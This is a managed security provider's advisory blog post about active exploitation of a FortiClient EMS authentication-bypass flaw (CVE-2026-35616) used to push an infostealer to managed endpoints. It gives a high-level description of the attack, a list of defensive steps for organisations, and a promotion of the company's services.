Fortinet EMS Under Attack: What Businesses Need to Know

Christopher Souza | CEO

Cybersecurity researchers have identified active exploitation of a critical vulnerability affecting Fortinet FortiClient Endpoint Management Server (EMS). The vulnerability, tracked as CVE-2026-35616, is being leveraged by threat actors to gain unauthorized administrative access to FortiClient EMS environments and distribute credential-stealing malware to managed endpoints. Our partners at Arctic Wolf recently reported attacks where threat actors abused trusted endpoint management infrastructure to deploy a newly identified malware family known as EKZ Infostealer.

Rather than targeting individual workstations, attackers are seeking access to centralized management platforms that can be used to distribute malicious code across an organization’s entire device fleet. In this case, FortiClient EMS became the delivery mechanism for malware that appeared to be a legitimate Fortinet software update.

What Is CVE-2026-35616?

CVE-2026-35616 is a critical vulnerability in FortiClient EMS with a CVSS score of 9.1. The flaw stems from improper access controls that allow unauthenticated attackers to bypass API authentication mechanisms and perform privileged administrative actions. Fortinet confirmed the vulnerability has been actively exploited in the wild and they released emergency hotfixes and subsequent product updates to address the issue.

Once attackers gain access to a vulnerable EMS server, they can modify configurations and leverage the platform’s legitimate management capabilities to execute commands on managed endpoints. This effectively transforms a centralized security management tool into a large-scale malware deployment platform.

Key Notes About the Active Threat

• Attackers are actively exploiting CVE-2026-35616 against vulnerable FortiClient EMS deployments.
• The vulnerability allows threat actors to bypass authentication and gain privileged access to EMS management functions.
• Compromised EMS servers have been used to distribute malware disguised as a legitimate Fortinet software update.
• The attack leverages FortiClient’s own endpoint management and scripting functionality to execute malicious commands on managed devices.
• A single compromised EMS server can potentially expose every endpoint managed by that server.
• Fortinet has released security updates and hotfixes that address the vulnerability.
• The vulnerability has been added to CISA’s Known Exploited Vulnerabilities catalog due to active exploitation activity.

Recommended Actions for Organizations

Organizations using FortiClient EMS should treat this threat as a high-priority security concern and take these immediate steps to assess their exposure:

• Verify whether FortiClient EMS is deployed within your environment.
• Confirm all available Fortinet security updates and hotfixes have been applied.
• Review EMS configuration changes for unauthorized modifications.
• Investigate endpoint activity for suspicious software deployments or PowerShell execution.
• Audit VPN and endpoint management scripts for unexpected entries.
• Monitor authentication logs and management activity for signs of compromise.
• Consider rotating credentials and invalidating active sessions if compromise is suspected.
• Review browser-stored credentials and evaluate whether sensitive accounts may have been exposed.

TSI Can Help! Contact Us Today

As threat actors continue to target centralized management platforms and trusted administrative tools, vulnerability management and proactive monitoring remain critical components of an effective cybersecurity strategy.

TSI is actively monitoring developments related to CVE-2026-35616 and assisting organizations with vulnerability assessments, security reviews, patch management, and threat detection activities. If your organization utilizes Fortinet technologies and would like assistance evaluating its exposure to this vulnerability, contact us today and schedule a security review. Our team of experts help assess your environment, validate your cybersecurity posture, and provide guidance to reduce risk from this issue along with other emerging threats.

About Technical Support International

TSI is 37-year old cybersecurity (MSSP) and IT support (MSP) company specializing in helping DIB organizations address their NIST 800-171 and CMMC compliance obligations. As a CMMC-AB Registered Provider Organization (RPO), TSI offers a complete NIST 800-171 and CMMC support solution to help guide our clients toward a successful certification audit and provide the assurance that they’re adhering to these expansive compliance requirements.